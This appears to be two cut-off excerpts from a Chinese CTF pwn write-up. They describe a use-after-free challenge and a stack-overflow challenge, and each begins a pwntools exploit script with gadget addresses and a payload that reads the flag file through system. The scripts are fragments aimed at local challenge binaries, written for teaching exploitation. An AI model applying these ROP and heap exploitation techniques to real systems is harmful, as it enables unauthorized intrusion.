查看保护 查看ida 这里我们仅可以修改最新申请出来的堆块,但是有uaf漏洞。 完整exp: from pwn import*#context(log_level='debug')p=process('./orange')free_got=0x201F78def alloc(size,content):p.sendlineafter(b'Please input your c
查看保护 查看ida 这里有一次栈溢出,并且题目给了我们system函数。 这里的知识点没有那么复杂 完整exp: from pwn import*p=process('./pwn')pop_rdi=0x400933info=0x601090system=0x400778payload=b"ca\\t flag 1>&2"print(len(payload))pa